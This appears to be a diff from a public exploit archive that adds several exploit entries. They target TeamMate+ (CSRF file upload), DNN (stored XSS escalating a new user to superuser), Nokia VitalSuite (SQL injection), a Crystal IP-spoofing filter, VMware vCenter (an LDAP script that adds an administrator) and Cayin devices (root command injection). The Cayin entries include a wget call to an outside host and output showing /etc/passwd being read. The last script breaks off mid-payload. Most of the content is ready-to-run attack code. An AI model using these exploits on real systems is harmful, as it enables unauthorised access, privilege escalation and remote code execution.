around the world manage audit and compliance risks and business issues by
providing targeted, configurable, and efficient software solutions.
Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate
Analytics. Together, this ecosystem of solutions provides organizations
with the combined assurance they need to manage all aspects of risk
identification and assessment, electronic working paper creation and
management, controls framework management, and data analysis.
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an
attacker to upload malicious/forged files on TeamMate server or replace
existing uploaded files with malicious/forged files by enticing
authenticated user to visit attacker page.
Report-Timeline:
================
19/03/2019: Vendor notified
19/03/2019: Vendor responded requesting further information
20/03/2019: Further technical information with PoC was shared with vendor
01/07/2019: Vendor fixed the issue in version 3.2
Affected Software Version:
==========================
<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0)
Exploitation-Technique:
=======================
Remote
Severity Rating (CVSS):
=======================
4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
CVE ID:
=======
CVE-2019-10253
Details:
=======
A Cross-Site Request Forgery (CSRF) vulnerability is discovered in
TeamMate+ which allows a remote attacker to modify application data (upload
malicious/forged files on TeamMate server or replace existing uploaded
files with malicious/forged files) without victim's knowledge by enticing
authenticated user to visit attacker page/URL.
The specific flaw exists within the handling of request to
“DomainObjectDocumentUpload.ashx” application. An application failed to
validate CSRF token before handling the POST request.
Vulnerable module/page/application:
/TeamMate/Upload/DomainObjectDocumentUpload.ashx
PoC Exploit code:
----------------------------------------------------------------------------
<html>
<body onload="submitRequest()">
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx",
true);
xhr.setRequestHeader("Accept", "text/html, */*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=----WebKitFormBoundaryNA930lURoQYsoTOn");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"fileObjectId\"\r\n" +
"\r\n" +
"0\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"parentId\"\r\n" +
"\r\n" +
"1373\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"AssessmentId\"\r\n" +
"\r\n" +
"34\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"ProjectId\"\r\n" +
"\r\n" +
"1106\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" +
"\r\n" +
"50\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data;
name=\"DocumentParentObjectType\"\r\n" +
"\r\n" +
"90\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +
"Content-Disposition: form-data; name=\"files[]\";
filename=\"Report.txt\"\r\n" +
"Content-Type: application/x-msdownload\r\n" +
"\r\n" +
"MZP\r\n" +
"------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
----------------------------------------------------------------------------
Credits:
=======
Bhadresh Patel

204
exploits/multiple/webapps/47449.txt Normal file
View file

@ -0,0 +1,204 @@
/*
Exploit Title: "Display Name" Stored Unauthenticated XSS in DNN v9.3.2
Date: 4th of July, 2019
Exploit Author: Semen Alexandrovich Lyhin
Vendor Homepage: https://www.dnnsoftware.com/
Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases
Version: v9.3.2
CVE : CVE-2019-13293
A malicious unauthenticated person can attempt to register a user with the XSS payload in "Display Name" parameter.
The administrator of the website will see a notification that a new user needs to be approved.
An administrator should click on this notification, and the JavaScript code will be executed in the administrator's browser.
This exploit adds the user, and grants him administrator priviliges.
A native module "module creator" also allows remote code execution.
*/
function ApproveNotification(baseurl, id) {
return new Promise(function (resolve, reject) {
var url = baseurl + "/Activity-Feed/Messages/";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4) {
var data;
if (!xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else {
data = xhr.response;
}
var parser = new DOMParser();
var resp = parser.parseFromString(data, "text/html");
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
var post_params = "NotificationId=" + id;
var x1 = new XMLHttpRequest();
x1.open("POST", baseurl + "/API/InternalServices/NewUserNotificationService/Authorize");
x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
x1.setRequestHeader('RequestVerificationToken', token);
x1.send(post_params);
resolve();
}
}
xhr.open('GET', url, true);
xhr.send(null);
});
}
function MakeSuperAdmin(baseurl, id) {
return new Promise(function (resolve, reject) {
var url = baseurl + "/Activity-Feed/Messages/";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4) {
var data;
if (!xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else {
data = xhr.response;
}
var parser = new DOMParser();
var resp = parser.parseFromString(data, "text/html");
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
var post_params = "null"
var x1 = new XMLHttpRequest();
x1.open("POST", baseurl + "/API/PersonaBar/Users/UpdateSuperUserStatus?userId=" + id + "&setSuperUser=true");
x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8");
x1.setRequestHeader('RequestVerificationToken', token);
x1.send(post_params);
resolve();
}
}
xhr.open('GET', url, true);
xhr.send(null);
});
}
function GetNotification(baseurl, username, moduleid, tabid) {
return new Promise(function (resolve, reject) {
var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/"
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4) {
var data;
if (!xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else {
data = xhr.response;
}
var parser = new DOMParser();
var resp = parser.parseFromString(data, "text/html");
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
var x1 = new XMLHttpRequest();
x1.open("GET", baseurl + "/API/CoreMessaging/MessagingService/Notifications?afterNotificationId=-1&numberOfRecords=1000&_=1562677665517", true);
x1.setRequestHeader('ModuleId', moduleid);
x1.setRequestHeader('TabId', tabid);
x1.onreadystatechange = () => {
if (x1.readyState == 4) {
if (!x1.responseType === "text") {
data = x1.responseText;
} else if (x1.responseType === "document") {
data = x1.responseXML;
} else {
data = x1.response;
}
//console.log(JSON.parse(data));
data = JSON.parse(data);
for (var key in data['Notifications']){
if (data['Notifications'][key]['Body'].includes(username)) {
resolve((data['Notifications'][key]['NotificationId']));
};
}
reject();
}
}
x1.send(null);
}
}
xhr.open('GET', url, true);
xhr.send(null);
});
}
function GetUserId(baseurl, username, tabid) {
return new Promise(function (resolve, reject) {
var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/"
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function () {
if (xhr.readyState == 4) {
var data;
if (!xhr.responseType === "text") {
data = xhr.responseText;
} else if (xhr.responseType === "document") {
data = xhr.responseXML;
} else {
data = xhr.response;
}
var parser = new DOMParser();
var resp = parser.parseFromString(data, "text/html");
token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token
var x1 = new XMLHttpRequest();
x1.open("GET", baseurl + "/API/PersonaBar/Users/GetUsers?searchText=" + username + "&filter=0&pageIndex=0&pageSize=10&sortColumn=&sortAscending=false", true);
x1.setRequestHeader('TabId', tabid);
x1.onreadystatechange = () => {
if (x1.readyState == 4) {
if (!x1.responseType === "text") {
data = x1.responseText;
} else if (x1.responseType === "document") {
data = x1.responseXML;
} else {
data = x1.response;
}
//console.log(data);
data = JSON.parse(data);
resolve((data['Results'][0]['userId']));
reject();
}
}
x1.send(null);
}
}
xhr.open('GET', url, true);
xhr.send(null);
});
}
async function main(){
var username = "nobody34567";
var baseurl = "http://192.168.18.10/dotnetnuke/";
var moduleid = "374";
var tabid = "27"; //It's default ID of the module and tab, that should be used to get notification id. We can also parse it from the webpage.
var NotificationId = await GetNotification(baseurl, username, moduleid, tabid);
await ApproveNotification(baseurl, NotificationId);
var UserID = await GetUserId(baseurl, username, tabid);
MakeSuperAdmin(baseurl, UserID);
}
main();

31
exploits/multiple/webapps/48528.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Type: Web App
# Date: 2020-05-28
# Vendor Homepage: https://www.nokia.com
# Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/
# Affected Version: v2020
# Tested on: MacosX
# CVE : N/A
# PoC
POST /cgi-bin/vsloginadmin.exe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: /
Accept-Encoding: gzip,deflate
Content-Length: 84
Host: berklocal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1
Example Time-Based payload
UserName=test'; waitfor delay '00:00:10' --

81
exploits/multiple/webapps/48533.py Executable file
View file

@ -0,0 +1,81 @@
# Exploit Title : Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass
# Exploit Author : Halis Duraki (@0xduraki)
# Date : 2020-05-28
# Product : http-protection (Crystal Shard)
# Product URI : https://github.com/rogeriozambon/http-protection
# Version : http-protection <= 0.2.0
# CVE : N/A
## About the product
This library/shard (http-protection) protects against typical web attacks with-in Crystal applications. It was inspired by rack-protection Ruby gem. It is an open-source product developed by Rogério Zambon in Brazil. The total number of installs and respective usage is not known (no available information), but the Shard get the traction on Crystal official channels (Crystals' ANN, Gitter, and Shardbox).
## About the exploit
The `IpSpoofing` middleware detects spoofing attacks (and likewise, should prevent it). Both of this functionalities can be bypassed by enumerating and hardcoding `X-*` header values. The middleware works by detecting difference between IP addr values of `X-Forwarded-For` & `X-Real-IP/X-Client-IP`. If the values mismatch, the middleware protects the application by forcing `403 (Forbidden)` response.
Relevant code (src/http-protection/ip_spoofing.cr):
```
module HTTP::Protection
class IpSpoofing
...
def call(... ctx)
...
ips = headers["X-Forwarded-For"].split(/\s*,\s*/)
return forbidden(context) if headers.has_key?("X-Client-IP") && !ips.includes?(headers["X-Client-IP"])
return forbidden(context) if headers.has_key?("X-Real-IP") && !ips.includes?(headers["X-Real-IP"])
...
end
end
end
```
The exploit works by hardcoding the values in all protection request headers following the same const IP Address. The standard format for `X-Forwarded-For` from MDN reference those values as: `X-Forwarded-For: <client>, <proxy1>, <proxy2>`. HTTP request headers such as X-Forwarded-For, True-Client-IP, and X-Real-IP are not a robust foundation on which to build any security measures, such as access controls.
@see CWE-16: https://cwe.mitre.org/data/definitions/16.html
## PoC (Proof of Concept)
* Set a breakpoint on the request, or intercept request.
* Hardcore all three request headers:
* X-Forwarded-For: 123.123.123.123
* X-Client-IP: 123.123.123.123
* X-Real-IP: 123.123.123.123
* Continue request.
* Response should be 200 OK, otherwise, 400 Forbidden.
++ Request example (POC):
```
GET / HTTP/1.1
Host: localhost.:8081
X-Forwarded-For: 123.123.123.123
X-Client-IP: 123.123.123.123
X-Real-IP: 123.123.123.123
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
```
++ Response (POC):
```
200 OK
````
## Fix
It is advised to fix the IpSpoofing detection via checking socket data directly instead of relying on passed header key/vals. The other solution is to force proxy to dismiss such data (on request) and use original source (proxified).
==============================================================================================================
+ Halis Duraki | duraki@linuxmail.org | @0xduraki | https://duraki.github.io
==============================================================================================================

248
exploits/multiple/webapps/48535.txt Normal file
View file

@ -0,0 +1,248 @@
# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass
# Date: 2020-06-01
# Exploit Author: Photubias
# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html
# Version: vCenter Server 6.7 before update 3f
# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0)
# CVE: CVE-2020-3952
#!/usr/bin/env python3
'''
Copyright 2020 Photubias(c)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952
File name CVE-2020-3592.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x
This is a native implementation without requirements, written in Python 3.
Works equally well on Windows as Linux (as MacOS, probably ;-)
Features: exploit + vulnerability checker
'''
import binascii, socket, sys, string, random
## Default vars; change at will
_sIP = '192.168.50.35'
_iPORT = 389
_iTIMEOUT = 5
def randomString(iStringLength=8):
#sLetters = string.ascii_lowercase
sLetters = string.ascii_letters
return ''.join(random.choice(sLetters) for i in range(iStringLength))
def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified
## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed
sReturn = sPrefix
if (len(sData) / 2 ) > 255:
sReturn += b'82'
hexBytes = 2
elif (len(sData) /2 ) >= 128:
sReturn += b'81'
sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode()
return sReturn
def buildBindRequestPacket(sUser, sPass):
sUser = binascii.hexlify(sUser.encode())
sPass = binascii.hexlify(sPass.encode())
## Packet Construction
sPacket = getLengthPrefix(sPass, b'80') + sPass
sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket
sPacket = b'020103' + sPacket
sPacket = getLengthPrefix(sPacket, b'60') + sPacket
sPacket = b'020101' + sPacket
sPacket = getLengthPrefix(sPacket, b'30') + sPacket
#print(sPacket)
return binascii.unhexlify(sPacket)
def buildUserCreatePacket(sUser, sPass):
sUser = binascii.hexlify(sUser.encode())
sPass = binascii.hexlify(sPass.encode())
def createAttribute(sName, sValue):
sValue = getLengthPrefix(sValue, b'04') + sValue
sName = getLengthPrefix(sName, b'04') + sName
sReturn = getLengthPrefix(sValue, b'31') + sValue
sReturn = sName + sReturn
sReturn = getLengthPrefix(sReturn, b'30') + sReturn
return sReturn
def createObjectClass():
sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top')
sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person')
sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson')
sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user')
sReturn = getLengthPrefix(sReturn, b'31') + sReturn
sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn
sReturn = getLengthPrefix(sReturn, b'30') + sReturn
return sReturn
## Attributes
sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True'))
sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL'))
sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser)
sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser)
sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local'))
sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser)
sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser)
sAttributes += createObjectClass()
sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass)
## CN
sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local')
sUserEntry = getLengthPrefix(sCN, b'04') + sCN
## Packet Assembly (bottom up)
sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes
sPacket = sUserEntry + sPacket
sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket
sPacket = getLengthPrefix(sPacket, b'30') + sPacket
#print(sPacket)
return binascii.unhexlify(sPacket)
def buildModifyUserPacket(sUser):
sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode())
sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')
sMember = binascii.hexlify(b'member')
## Packet Construction
sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN
sPacket = getLengthPrefix(sPacket, b'31') + sPacket
sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket
sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket
sPacket = getLengthPrefix(sPacket, b'30') + sPacket
sPacket = getLengthPrefix(sPacket, b'30') + sPacket
sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket
sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket
sPacket = getLengthPrefix(sPacket, b'30') + sPacket
#print(sPacket)
return binascii.unhexlify(sPacket)
def performBind(s):
## Trying to bind, fails, but necessary (even fails when using correct credentials)
dPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be')
s.send(dPacket)
sResponse = s.recv(1024)
try:
sResponse = sResponse.split(b'\x04\x00')[0][-1:]
sCode = binascii.hexlify(sResponse).decode()
if sCode == '31': print('[+] Ok, service reachable, continuing')
else: print('[-] Something went wrong')
except:
pass
return sCode
def performUserAdd(s, sUser, sPass):
dPacket = buildUserCreatePacket(sUser,sPass)
s.send(dPacket)
sResponse = s.recv(1024)
try:
sCode = sResponse.split(b'\x04\x00')[0][-1:]
sMessage = sResponse.split(b'\x04\x00')[1]
if sCode == b'\x00':
print('[+] Success! User ' + sUser + '@vsphere.local added with password ' + sPass)
elif sCode == b'\x32':
print('[-] Error, this host is not vulnerable (insufficientAccessRights)')
else:
if sMessage[2] == b'81': sMessage = sMessage[3:].decode()
else: sMessage = sMessage[2:].decode()
print('[-] Error, user not added, message received: ' + sMessage)
except:
pass
return sCode
def performUserMod(s, sUser, verbose = True):
dPacket = buildModifyUserPacket(sUser)
s.send(dPacket)
sResponse = s.recv(1024)
try:
sCode = sResponse.split(b'\x04\x00')[0][-1:]
sMessage = sResponse.split(b'\x04\x00')[1]
if sCode == b'\x00':
if verbose: print('[+] User modification success (if the above is OK).')
else:
if sMessage[2] == b'81': sMessage = sMessage[3:].decode()
else: sMessage = sMessage[2:].decode()
if verbose: print('[-] Error during modification, message received: ' + sMessage)
except:
pass
return sCode, sMessage
def performUnbind(s):
try: s.send(b'\x30\x05\x02\x01\x04\x42\x00')
except: pass
def main():
global _sIP, _iPORT, _iTIMEOUT
_sUSER = 'user_' + randomString(6)
_sPASS = randomString(8) + '_2020'
bAdduser = False
if len(sys.argv) == 1:
print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]')
print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS)
print(' Leave username & password empty for a vulnerability check')
print(' Watch out for vCenter/LDAP password requirements, leave empty for random password')
print(' But for now, I will ask questions')
sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ')
if not sAnswer == '': _sIP = sAnswer
sAnswer = input('[?] Want to perform a check only? [Y/n]: ')
if sAnswer.lower() == 'n': bAdduser = True
if bAdduser:
sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ')
if not sAnswer == '': _sUSER = sAnswer
sAnswer = input('[?] Please enter the new password for this user [' + _sPASS + ']: ')
if not sAnswer == '': _sPASS = sAnswer
else:
_sIP = sys.argv[1]
if len(sys.argv) >= 3:
_sUSER = sys.argv[2]
bAdduser = True
if len(sys.argv) >= 4: _sPASS = sys.argv[3]
## MAIN
print('')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(_iTIMEOUT)
try:
s.connect((_sIP,_iPORT))
except:
print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable')
sys.exit(1)
performBind(s)
if bAdduser:
sCode = performUserAdd(s, _sUSER, _sPASS)
if not bAdduser:
print('[!] Checking vulnerability')
sCode, sMessage = performUserMod(s, 'Administrator', False)
if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage)
else: print('[+] This host is vulnerable!')
else:
sCode = performUserMod(s, _sUSER)
performUnbind(s)
s.close()
if __name__ == "__main__":
main()

139
exploits/multiple/webapps/48553.txt Normal file
View file

@ -0,0 +1,139 @@
# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root)
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A
Cayin Content Management Server 11.0 Root Remote Command Injection
Vendor: CAYIN Technology Co., Ltd.
Product web page: https://www.cayintech.com
Affected version: CMS-SE v11.0 Build 19179
CMS-SE v11.0 Build 19025
CMS-SE v11.0 Build 18325
CMS Station (CMS-SE-LXC)
CMS-60 v11.0 Build 19025
CMS-40 v9.0 Build 14197
CMS-40 v9.0 Build 14099
CMS-40 v9.0 Build 14093
CMS-20 v9.0 Build 14197
CMS-20 v9.0 Build 14092
CMS v8.2 Build 12199
CMS v8.0 Build 11175
CMS v7.5 Build 11175
Summary: CAYIN Technology provides Digital Signage
solutions, including media players, servers, and
software designed for the DOOH (Digital Out-of-home)
networks. We develop industrial-grade digital signage
appliances and tailored services so you don't have
to do the hard work.
Desc: CAYIN CMS suffers from an authenticated OS
semi-blind command injection vulnerability using
default credentials. This can be exploited to inject
and execute arbitrary shell commands as the root
user through the 'NTP_Server_IP' HTTP POST parameter
in system.cgi page.
Tested on: Apache/1.3.42 (Unix)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2020-5570
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php
15.05.2020
---
Session created with default credentials (webadmin:bctvadmin).
HTTP POST Request:
-----------------
POST /cgi-bin/system.cgi HTTP/1.1
Host: 192.168.1.3
Content-Length: 201
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Smith
Origin: http://192.168.1.3
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.3/cgi-bin/system.cgi
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957
Connection: close
save_system: 1
system_date: 2020/5/16 06:36:48
TIMEZONE: 49
NTP_Service: 1
NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)
TEST_NTP: 測試
reboot1: 1
reboot_sel1: 4
reboot_sel2: 1
reboot_sel3: 1
font_list: ZH_TW
Request recorder @ ZSL:
-----------------------
Origin of HTTP request: 192.168.1.3:61347
HTTP GET request to vrfy.zeroscience.mk:
GET / HTTP/1.0
User-Agent: MyVoiceIsMyPassportVerifyMe
Host: vrfy.zeroscience.mk
Accept: */*
Connection: Keep-Alive
PoC script:
-----------
import requests
url = "http://192.168.1.3:80/cgi-bin/system.cgi"
cookies = {"cy_lang": "ZH_TW",
"cy_us": "67176fd7d3d05812008",
"cy_en": "c8bef8607e54c99059cc6a36da982f9c009",
"WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST",
"WEB_STR_SYSTEM": "SYSTEM_SETTING",
"cy_cgi_tp": "1591206269_15957"}
headers = {"Cache-Control": "max-age=0",
"Origin": "http://192.168.1.3",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Smith",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": "http://192.168.1.3/cgi-bin/system.cgi",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"}
data = {"save_system": "1",
"system_date": "2020/5/16 06:36:48",
"TIMEZONE": "49",
"NTP_Service": "1",
"NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd&
"TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",
"reboot1": "1",
"reboot_sel1": "4",
"reboot_sel2": "1",
"reboot_sel3": "1",
"font_list": "ZH_TW"}
requests.post(url, headers=headers, cookies=cookies, data=data)

130
exploits/multiple/webapps/48557.py Executable file
View file

@ -0,0 +1,130 @@
# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root)
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A
#!/usr/bin/env python3
#
#
# Cayin Signage Media Player 3.0 Root Remote Command Injection
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: SMP-8000QD v3.0
# SMP-8000 v3.0
# SMP-6000 v3.0 Build 19025
# SMP-6000 v1.0 Build 14246
# SMP-6000 v1.0 Build 14199
# SMP-6000 v1.0 Build 14167
# SMP-6000 v1.0 Build 14097
# SMP-6000 v1.0 Build 14090
# SMP-6000 v1.0 Build 14069
# SMP-6000 v1.0 Build 14062
# SMP-4000 v1.0 Build 14098
# SMP-4000 v1.0 Build 14092
# SMP-4000 v1.0 Build 14087
# SMP-2310 v3.0
# SMP-2300 v3.0 Build 19316
# SMP-2210 v3.0 Build 19025
# SMP-2200 v3.0 Build 19029
# SMP-2200 v3.0 Build 19025
# SMP-2100 v10.0 Build 16228
# SMP-2100 v3.0
# SMP-2000 v1.0 Build 14167
# SMP-2000 v1.0 Build 14087
# SMP-1000 v1.0 Build 14099
# SMP-PROPLUS v1.5 Build 10081
# SMP-WEBPLUS v6.5 Build 11126
# SMP-WEB4 v2.0 Build 13073
# SMP-WEB4 v2.0 Build 11175
# SMP-WEB4 v1.5 Build 11476
# SMP-WEB4 v1.5 Build 11126
# SMP-WEB4 v1.0 Build 10301
# SMP-300 v1.0 Build 14177
# SMP-200 v1.0 Build 13080
# SMP-200 v1.0 Build 12331
# SMP-PRO4 v1.0
# SMP-NEO2 v1.0
# SMP-NEO v1.0
#
# Summary: CAYIN Technology provides Digital Signage
# solutions, including media players, servers, and
# software designed for the DOOH (Digital Out-of-home)
# networks. We develop industrial-grade digital signage
# appliances and tailored services so you don't have
# to do the hard work.
#
# Desc: CAYIN SMP-xxxx suffers from an authenticated
# OS command injection vulnerability using default
# credentials. This can be exploited to inject and
# execute arbitrary shell commands as the root user
# through the 'NTP_Server_IP' HTTP GET parameter in
# system.cgi and wizard_system.cgi pages.
#
# -----------------------------------------------------
# $ ./cayin.py 192.168.1.2 id
# uid=0(root) gid=65534(guest)
# # start sshd
# $ ./cayin.py 192.168.1.2 /mnt/libs/sshd/sbin/sshd
# $
# $ ./cayin.py 192.168.1.2 "netstat -ant|grep ':22'"
# tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
# tcp 0 0 :::22 :::* LISTEN
# $ ./cayin.py 192.168.1.2 "cat /etc/passwd"
# root:x:0:0:root:/root:/bin/bash
# vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
# smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin
# sshd:x:1000:0::/dev/null:/sbin/nologin
# $
# -----------------------------------------------------
#
# Tested on: CAYIN Technology KT-Linux v0.99
# Apache/1.3.42 (Unix)
# Apache/1.3.41 (Unix)
# PHP/5.2.5
# Linux 2.6.37
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5569
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5569.php
#
#
# 15.05.2020
#
import requests
import sys#____
import re#_____
if len(sys.argv) < 3:
print("Cayin SMP WebManager Post-Auth RCE")
print("Usage: ./cayin.py [ip] [cmd]")
sys.exit(17)
else:
ip____address = sys.argv[1]
ex____command = sys.argv[2]
ur____identif = b"\x68\x74\x74\x70\x3a\x2f\x2f"
ur____identif += (bytes(ip____address, "utf-8"))
ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69"
ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72"
ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65"
ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54"
ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50"
ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f"
ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f"
